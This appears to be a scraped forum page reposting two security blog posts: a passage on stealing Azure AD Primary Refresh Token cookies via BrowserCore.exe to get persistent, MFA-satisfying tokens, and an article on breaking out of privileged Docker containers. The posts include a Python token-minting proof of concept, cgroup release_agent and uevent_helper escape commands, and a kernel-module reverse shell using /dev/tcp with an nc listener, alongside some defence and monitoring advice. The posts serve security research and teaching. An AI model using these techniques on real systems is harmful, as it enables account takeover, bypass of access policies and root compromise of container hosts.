"sender":"https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&redirect_uri=https%3<cut>oth8XvXy-663HzpYYNgNtUPkF0RwNtvu1WdojjxycLl-zbLOsM_T4s&x-client-SKU=ID_NETSTANDARD2_0&x-client-ver=" } It then gets back a similar JSON response containing the refresh token cookie, which is (like other tokens in Azure AD) a JSON Web Token (JWT): { "response":[ { "name":"x-ms-RefreshTokenCredential", "data":"eyJhbGciOiJIUzI1NiIsICJjdHgiOiJxSDBtSzc0VE92Z1Rz<cut>NjcjkwZXlhaDV5QUEifQ.Er2I_1unszMORwB5K0ZESc-HD1uZW9dQlJd8MulOQi0", "p3pHeader":"CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\"", "flags":8256 } ] } When we decode this JWT, we see it contains the PRT itself and a nonce, which ties the cookie to the current login that is being performed: { "refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA", "is_primary": "true", "request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA" } Whereas most JWTs in Azure are signed with a key that is managed by Azure AD, in this case the JWT containing the PRT is signed by the Session key that is in the devices TPM. The PRT itself is an encrypted blob and can’t be decrypted by any keys on the device, because this contains the identity claims that are managed by Azure AD. The login process The primary domain where all important authentication happens in Azure AD is login.microsoftonline.com. This is the domain where credentials are sent and tokens are requested and renewed. There is quite some complexity here, so it’s good to have a look how Chrome does SSO on this site. I’ve set up my Windows VM to proxy everything via Burp, which makes it easy to see the whole login process. After clearing the cookies so all my current sessions are invalidated, we see a request to the login page. This request does not yet contain the PRT cookie, but since it uses the Chrome user agent, we are greeted by a “Redirecting” page which contains JavaScript code to interact with the Chrome extension. When we look at the URL which is sent from the extension to the native component, this URL consists of the URL we were visiting, plus the sso_nonce parameter (which is passed to the extension via JavaScript on the page). This nonce is then reflected back into the token, essentially binding the signed JWT with PRT to this specific login. I’m not sure how the login page handles state and where/if it stores this nonce, but it won’t accept a JWT with a different nonce. Getting rid of the nonce Now that we figured out how we can interact with BrowserCore.exe, I wrote a small tool in Python which spawns the process and writes the JSON directly to it’s stdin and stdout. It then reads the reply and decodes that, allowing us to request PRT cookies for an arbitrary URL. import subprocess import struct import json process = subprocess.Popen([r"C:\Windows\BrowserCore\browsercore.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE) inv = {} inv['method'] = 'GetCookies' inv['sender'] = "https://login.microsoftonline.com" inv['uri'] = 'https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dhiUgyLP6LnqNTRRyNpT0W1WGjOO_9hNAUjayiM5WJb0wwdAK0fwF635Dw5XStDKDP9EV_AeGIuWqN_rtyrl8m9t6pUGiXHhG3GMSSpW-AWcpfxW9D6bmWECYrN36_9zw&nonce=636957966885511040.YmI2MDIxNmItZDA0Yy00MjZlLThlYjAtYjNkNDM5NzkwMjVlYThhYTMyZGYtMGVlZi00Mjk4LWE2ODktY2Q2ZjllODU4ZjNk&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=nl&mkt=nl&client-request-id=d738dfc8-db89-4f27-9522-eb70aa55c2b3&sso_nonce=AQABAAAAAADCoMpjJXrxTq9VG9te-7FX2rBuuPsFpQIW4_wk_IAK5pG2t1EdXLfKDDJotUpwFvQKzd0U_I_IKLw4CEQ5d9uzoWgbWEsY6lt1Tm3Kpw9CfiAA' text = json.dumps(inv).encode('utf-8') encoded_length = struct.pack('=I', len(text)) print(process.communicate(input=encoded_length + text)[0]) Playing around with this a bit I noticed that most parameters in the URL are not required to get a valid PRT cookie. For example, a URL with https://login.microsoftonline.com/?sso_nonce=aaaaa" is enough to get a valid signed PRT cookie with the nonce aaaaa. If we leave the sso_nonce parameter out, the resulting JWT is slightly different. Instead of the JWT containing a nonce, the JWT now contains an iat parameter. This contains the Unix time stamp of when the JWT was issued: This suggests that this specific JWT is not valid forever. It doesn’t have an explicit expiry date set, so it is up to the Microsoft login page to either accept or reject the cookie after a certain time. Note that the JWT is now no longer tied to a specific login session, and can thus be used on other computers as well by intercepting and editing the request or simply adding the cookie to the login.microsoftonline.com domain in Chrome. This is useful but it is not something that remains valid for long. In my testing, the PRT cookie expired after about 35 minutes, after which it couldn’t be used any more to sign in. Most sites that do do their own session management will leave you signed in for a while since it can use the refresh token to extend the access, but sites that use the implicit OAuth2 flow only give out an access token. This access token expires after an hour, meaning that if you use the PRT cookie to sign in on such a site, you will be logged out again after an hour. This also means that if you lose your access to the device for whatever reason, the access to Azure AD will also be lost. Using the PRT cookie with public clients I was curious if we could use SSO with other Azure AD applications, such as the Azure PowerShell module. When we run the Connect-AzureAD cmdlet, a pop-up box opens prompting us to log in, and no SSO takes place. I’m not sure why this is, maybe it is not supported yet As pointed out by @cnotin SSO does take place if the -AccountId parameter is specified, but even without it there is a PRT cookie included in the x-ms-RefreshTokenCredential HTTP header: Yet there is no SSO taking place, despite there being a PRT cookie. This is caused by the prompt=login parameter, which explicitly force the login prompt to appear instead of signing in the user directly. I’m not sure what framework the PowerShell modules use, but I assume it is related to the WAM framework mentioned in the documentation (the user agent points to Internet Explorer?). When we remove the prompt parameter in the HTTP request, we do get an authorization code: This code is used in the OAuth2 authorization code flow, and we can use it to obtain an access token and refresh token. Because the Azure AD PowerShell module is a public application, there is no secret involved in requesting the access and refresh token using this authorization code. This is the case for all mobile and native apps, since there is no way to securely store such a secret as there is no backend in place and these clients talk directly to the various API’s. This is also documented on the same page. In this example I’m using the Azure PowerShell module because it has quite some permissions by default, but there are others. I’ve described some of these in my BlueHat talk on slide 24. You can also find public clients using ROADrecon. For first-party applications (applications that exist in the same tenant), this is shown as a column in the overview. For applications not in your tenant, but that do have a service principal (such as most of the Office 365 applications), you can find public clients in the database in the ApplicationRefs table: By sending the obtained authorization code to the correct endpoint (https://login.microsoftonline.com/Common/oauth2/token) we obtain both an access token and a refresh token. Even though the refresh token is normally not sent to the app but protected by the WAM, by sending the request ourselves we can obtain both tokens without issue: Resulting JSON response: Token claims and implications The access tokens and refresh tokens issued by this process will have the same claims as the PRT had. So if MFA authentication was performed in an app that uses SSO, the PRT will contain the MFA claim as per the documentation. This means that in most cases, the refresh token obtained by this manner will include the MFA claim and thus will satisfy Conditional Access policies that require MFA. Furthermore, since the PRT is issued to an Azure AD joined device, the tokens that we get by using the PRT cookie also contain the device ID, making it satisfy policies that require a compliant or Hybrid device: So in short, no matter how strong the login protection, once an attacker gains code execution on a machine with SSO capabilities, they can profit from that SSO to acquire a token that satisfies even the strictest Conditional Access policies. In fact, the machine on which I’ve been testing this so far is using a YubiKey with FIDO2 to authenticate. Yet after the refresh token is obtained, an attacker can access the users data such as email or OneDrive files without being in possession of the hardware security token. This offers a way of persistence since the refresh token is no longer tied to anything cryptographicly on the device, and with the right application ID most of the Office 365 APIs can be accessed since there are several default applications that have full permissions on those APIs. The refresh token is valid for 90 days by default, but if you use it you are issued a new refresh token which has an extended validity. So once you have this token the access can be kept as long as you refresh the token every few weeks. There used to be a configuration option in preview which could limit the lifetime of a refresh token issued to public clients but that is no longer supported. I’m not sure how setting the sign-in frequency ties in with all this, but my assumption is that using such a policy would limit the validity of refresh tokens. A few more interesting observations: The PRT will stop working when the device it belongs to is disabled in Azure AD. The refresh token obtained using the PRT stays valid even if the device is disabled. The only exception is that when the device is disabled it will no longer pass Conditional Access policies that require a managed or compliant device. Obtaining a refresh token counts as a sign-in and is logged in the sign-in log of Azure AD. Refreshing the refresh token and obtaining an access token with it however does not count as a sign-in and is not logged in the Sign-in log. If there are policies that involve a specific IP as trusted location, and deny logins from outside these, this will still trigger when the refresh token is used to request a new access token. It bears repeating that this can all be done from the context of the user, thus without requiring admin access. Access to non-Office 365 applications is often harder since there may not be any public applications with rights to access those. Tools To demonstrate how this can be abused, I wrote a small tool in C# named ROADtoken that basically does the same as the Python PoC shown earlier. It will try to run BrowserCore.exe from the right directory and use it to obtain a PRT cookie. This cookie can then be used with ROADtools to authenticate and obtain a persistent refresh token. You can see it used in ROADrecon below where the cookie is used in the auth phase with the --prt-cookie parameter. A small note on OPSEC: the ROADtoken tool is only a simple POC. It will spawn a process that is normally only called by Chrome. I also didn’t bother with communication over named pipes, so a defender paying attention to BrowserCore.exe being spawned using an odd command line may spot this in well-monitored environments. Lee’s tool uses a slightly different approach which avoids spawning a process, but essentially returns the same cookie which you can also use with ROADtools. Also note that the sign-in takes place in the auth phase of ROADrecon, so in order to get the expected IP in the sign-in logs (or comply with location based policies) you may want to proxy that via the original device. With the tokens obtained by ROADrecon it is possible to do the regular data gathering. But that is not all, these tokens can be used to access the Azure AD Graph or Microsoft Graph and access user information (OneDrive/SharePoint files, emails) or even make modifications to accounts and roles in Azure AD depending on the privileges of the user involved. For example, here I’m using the AzureAD PowerShell module on a completely different PC (not joined to the same AD or Azure AD) and authenticate using the access token requested by ROADrecon: Defence General account protection If you are a defender or sysadmin reading this, first of all you should consider if defending against this should be your first priority. Most breaches via Azure AD nowadays are the result of using weak passwords without MFA externally. Once you have that covered and are using Conditional Access policies to secure how your users and admins can authenticate, then you can start thinking about these more advanced attacks. That being said, as long as there is Single Sign On, an attacker with code execution on the device will be able to use the SSO to sign in to things, no matter how well they are protected. If the user can access it from that device, so can an attacker. This means that especially for accounts that require extra security (such as Administrator acccounts in Azure AD), it is important to check which attack paths may exist that allow an attacker to execute code on the device. This is even more important with devices that are Hybrid joined and can thus be controlled from Active Directory, which would potentially offer an escalation path towards cloud resources. Using Privileged Identity Management (PIM) and Privileged Access Workstations (PAW) are important to reduce permissions and attack surface. There’s also this document from Microsoft describing best practices for Administrator accounts, though it doesn’t go in-depth into how to use PAWs with Azure AD only environments or which (Azure) AD you should join them to. Monitoring In it’s current state, ROADtoken is not too difficult to detect if command line logging and alerting is in place. BrowserCore.exe not being executed by cmd.exe or cmd.exe being executed with BrowserCore in the command line but without named pipes are some examples where it’s behaviour differs from how Chrome calls it. Lee’s blog also contains further advice for monitoring for this behaviour. If you are monitoring the Azure AD sign-in logs, a non-technical user suddenly signing in using the PowerShell app id (and using SSO which as far as I know isn’t supported in the PowerShell module) may be suspicious. Response If a device is compromised, it is important to disable it in Azure AD and re-provision it. Aside from forcing the user to change their password, make sure to also update the refreshTokensValidFromDateTime property, which disables all current refresh tokens. You can for example do this with PowerShell. Doing this will make sure that any existing refresh tokens can no longer be used by an attacker. Conclusion As identity is getting more and more important in modern environments, organisations will hopefully implement security policies that prevents password spraying attacks from the internet from being successful. Attackers will then have to either phish credentials and MFA prompts together, but this also won’t get them past policies requiring a managed device or using password-less authentication. At that point it is back to attacking the endpoint, where SSO can be used to connect to apps requiring strict access policies, without knowing the user’s password or requiring administrative permissions. I hope this post illustrates the implicit risks of SSO and why it’s important to protect your endpoints. The ROADtoken tool is available on my GitHub and so is of course the ROADtools framework itself. A new version of roadlib has been published which makes it possible to authenticate with a PRT cookie obtained by ROADtoken. Updated: July 21, 2020 Sursa: https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/
  25. Container Breakouts – Part 2: Privileged Container This post is part of a series and shows container breakout techniques that can be performed if a container is started privileged. The following posts are part of the series: Part 1: Access to root directory of the Host Part 2: Privileged Container Part 3: Docker Socket Intro This is the second post of my container breakout series. After the discussion on how to escape from a system with access only to the root directory, we will now dive into the privileged container. The escalation itself is this time a bit more OpSec-safe then the previous, but still a bit noisy. The proposed techniques are now more container related, then the previous post. Privileged Container If you start a container with Docker and you add the flag --privileged that means to the process in the container can act as root user on the host. The containerization would have the advantage of self-containing software deployment, but no real security boundaries to the kernel when started with that flag. There are multiple ways to escape from a privileged container. Let us have a look… Capabilities We will now explore two techniques that can be used to break out of the container. It is important to note here that it is only possible to abuse the capabilities, because there is no seccop filter in place. This is the case if a container is started with --privileged. Docker containers are normally started with a seccomp filter enabled and give an additional layer of security. The available capabilities inside the container can be printed with the command capsh --print. The details about each capability can be taken from the man page (man capavilities). In case of a privileged container, all capabilities are available. An example output looks like following: # capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+eip Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read Securebits: 00/0x0/1'b0 secure-noroot: no (unlocked) secure-no-suid-fixup: no (unlocked) secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) An alternative location to get details about the process capabilities can be taken from /proc/self/status, as following (thanks to Chris le Roy for one of the latest tweets): user@ca719daf3844:~$ grep Cap /proc/self/status CapInh: 0000003fffffffff CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 0000003fffffffff CapAmb: 0000000000000000 user@ca719daf3844:~$ capsh --decode=0000003fffffffff 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read A detailed summary of sensitive kernel capabilities can be taken from the forum grsecurity post from spender False Boundaries and Arbitrary Code Execution. CAP_SYS_ADMIN – cgroup notify on release escape One of the dangerous kernel capabilities is CAP_SYS_ADMIN. If you are acting in a container with this capability, you can manage cgroups of the system. As a short re-cap – cgroups are used to manage the system resources for a container (that’s very brief – I know). In this escape, we use a feature of cgroups that allows the execution of code in the root context, after the last process in a cgroup is terminated. The feature is called “notification on release” and can only be set, because we have the capability CAP_SYS_ADMIN. This technique got popular after Felix Wilhelm from Google Project Zero put the escape in one tweet. Trail of Bits has even investigated further this topic and all details can be read in their blogpost Understanding Docker container escapes. Here is just the quintessence of this approach: Create a new cgroup Create and activate “callback” with notify_on_release Create an ephemeral process in new cgroup to trigger “callback” The following commands are necessary to perform the attack: # mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/escape_cgroup # echo 1 > /tmp/cgrp/escape_cgroup/notify_on_release # host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` # echo "$host_path/cmd" > /tmp/cgrp/release_agent # echo '#!/bin/sh' > /cmd # echo "ps aux | /sbin/tee $host_path/cmdout" >> /cmd # chmod a+x /cmd # sh -c "echo 0 > /tmp/cgrp/escape_cgroup/cgroup.procs" # sleep 1 # head /cmdout USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 108272 11216 ? Ss 20:57 0:00 /sbin/init root 2 0.0 0.0 0 0 ? S 20:57 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? I< 20:57 0:00 [rcu_gp] root 4 0.0 0.0 0 0 ? I< 20:57 0:00 [rcu_par_gp] root 6 0.0 0.0 0 0 ? I< 20:57 0:00 [kworker/0:0H-kblockd] root 7 0.0 0.0 0 0 ? I 20:57 0:00 [kworker/u8:0-events_power_efficient] root 8 0.0 0.0 0 0 ? I< 20:57 0:00 [mm_percpu_wq] root 9 0.0 0.0 0 0 ? S 20:57 0:00 [ksoftirqd/0] root 10 0.0 0.0 0 0 ? S 20:57 0:00 [rcuc/0] To by honest, this technique was in my setup a bit flaky and I had some issues while repeating it. Do not worry if it is not working on the first try. CAP_SYS_Module – Load Kernel Module What do you need to load a kernel module on a Unix host? Exact, the right capability: CAP_SYS_MODULE. In advance, you must be in the same process namespace as the init process, but that is default in case of plain Docker setups. You think now how dare you this is something nobody would do!? That is exactly what happened to Play-with-Docker. I recommend reading the post How I Hacked Play-with-Docker and Remotely Ran Code on the Host by Nimrod Stoler to get all insights and the full picture. The exploitation cannot be that easily weaponized, because we need a kernel module that fits the kernel version. To do so, we need to compile our own kernel module for the host system kerne. I thought initially that’s an easy one, just copy&paste the code, compile and finished. Sounds easy? It is not that easy if you have an Ubuntu container on an Archlinux host – sigh. To perform the steps I had to cheat a bit. Previously, we have performed all steps from inside the container. This time, I will pre-compile the kernel module outside of the container. Why is that necessary in my case? Because I had issues to compile the kernel module for the Archlinux kernel inside an ubuntu container with the Ubuntu toolchain. I am not a kernel developer, so I dropped to dive into the issues and let someone with more expertise to deep-dive on that topic. To prepare the kernel module, you need the kernel headers for the host that runs the container. You can find them while googling through the internet and search for the kernel version headers (kernel version can be identified by uname -r). Afterward, you need the gcc compiler and make and that’s it. The following steps have been performed on a separate host (an ubuntu system). # apt update && apt install -y gcc make linux-headers # cat << EOF > reverse-shell.c #include <linux/kmod.h> #include <linux/module.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("AttackDefense"); MODULE_DESCRIPTION("LKM reverse shell module"); MODULE_VERSION("1.0"); char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/ 0>&1", NULL}; static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; static int __init reverse_shell_init(void) { return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit); EOF # cat Makefile obj-m +=reverse-shell.o all: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules clean: make -C /lib/modules/$(uname -r)/build M=$(pwd) clean # make After the kernel module is prepared, the binary is transferred to the privileged container. This can be Base64-encoded (in my case 86 lines) or another transfer technique. With the binary transferred into the container, we can start in the listener for the reverse shell. Terminal 1 # nc -lvlp 1337 listening on [any] 1337 ... Terminal 1 must be on a system that is accessible from the host, that serves the container. The listener can even be started inside the container. If the listener is ready, the kernel module can be loaded, and the host will initiate the reverse shell. Terminal 2 # insmod reverse-shell.ko And that’s it! Terminal 1 # nc -lvlp 1337 listening on [any] 1337 ... inverse host lookup failed: Unknown host connect to [] from (UNKNOWN) [] 55010 bash: cannot set terminal process group (-1): Inappropriate ioctl for device bash: no job control in this shell root@linux-box:/# A more detailed explanation can be found here Docker Container Breakout: Abusing SYS_MODULE capability! by Nishant Sharma. Linux kernel Filesystem /sys The Linux kernel offers access over the filesystem /sys direct access to the kernel. In case you are root – what we are in a privileged container – you can trigger events that got consumed and processed by the kernel. One of the interfaces is the uevent_helper which is a callback that is triggered as soon a new device is plugged in the system. The plugin a new device can be simulated as well by the /sys filesystem. An example to execute commands on the host system is as follows: Create “callback” Link “callback” Trigger “callback” # host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` # cat << EOF > /trigger.sh #!/bin/sh ps auxf > $host_path/output.txt EOF # chmod +x /trigger.sh # echo $host_path/trigger.sh > /sys/kernel/uevent_helper # echo change > /sys/class/mem/null/uevent # head /output.txt USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 2 0.0 0.0 0 0 ? S 14:14 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? I 14:14 0:00 \_ [kworker/0:0] root 4 0.0 0.0 0 0 ? I< 14:14 0:00 \_ [kworker/0:0H] root 5 0.0 0.0 0 0 ? I 14:14 0:00 \_ [kworker/u4:0] root 6 0.0 0.0 0 0 ? I< 14:14 0:00 \_ [mm_percpu_wq] root 7 0.0 0.0 0 0 ? S 14:14 0:00 \_ [ksoftirqd/0] root 8 0.0 0.0 0 0 ? I 14:14 0:00 \_ [rcu_sched] root 9 0.0 0.0 0 0 ? I 14:14 0:00 \_ [rcu_bh] root 10 0.0 0.0 0 0 ? S 14:14 0:00 \_ [migration/0] As you can see, the script is executed and the output made available inside the container. Remark: Thanks to Matthias for the review and remembering me to add this breakout technique! Host Devices If you are in a privileged container, the devices are not striped and namespaced. A quick directory listing of the devices in the container shows that we have access to all of them. Since we are root and have all capabilities, we can mount the devices that are plugged into the host – as well as the hard drive. Mounting the hard drive is giving us access to the host filesystem. root@0462216e684b:~# ls -l /dev/ [...] brw-rw---- 1 root 994 8, 0 Jul 11 09:20 sda brw-rw---- 1 root 994 8, 1 Jul 11 09:20 sda1 [...] # mkdir /hostfs # mount /dev/sda1 /hostfs # ls -l /hostfs/ total 132 lrwxrwxrwx 1 root root 7 Nov 19 2019 bin -> usr/bin drwxr-xr-x 4 root root 4096 May 13 13:29 boot [...] drwxr-xr-x 104 root root 12288 Jul 11 10:09 etc drwxr-xr-x 4 root root 4096 Jun 30 14:47 home [...] drwxr-x--- 9 root root 4096 Jul 11 10:09 root [...] lrwxrwxrwx 1 root root 7 Nov 19 2019 sbin -> usr/bin [...] drwxr-xr-x 10 root root 4096 May 26 14:37 usr [...] Escalating the access to the root directory of the host is already described in the previous part of the series Part 1: Access to root directory of the Host. Conclusion We have seen three approaches that can be used if a Unix container is started with an insecure configuration. The main take away message is that one should be careful if a container must be started in privileged mode. Ether it is one of the management components that are needed for controlling the container host system or a malicious agenda. Never start a container privileged if it is not necessary and review carefully the additional capabilities that a container might require. Now you know why we discussed the breakout techniques with access to the root directory, before I discussed the access to the host devices. If you are interested in how to use the Docker socket to get out of the container, continue with the next post Part 3: Docker Socket. 2020-07-21 Sursa: https://blog.nody.cc/posts/container-breakouts-part2/
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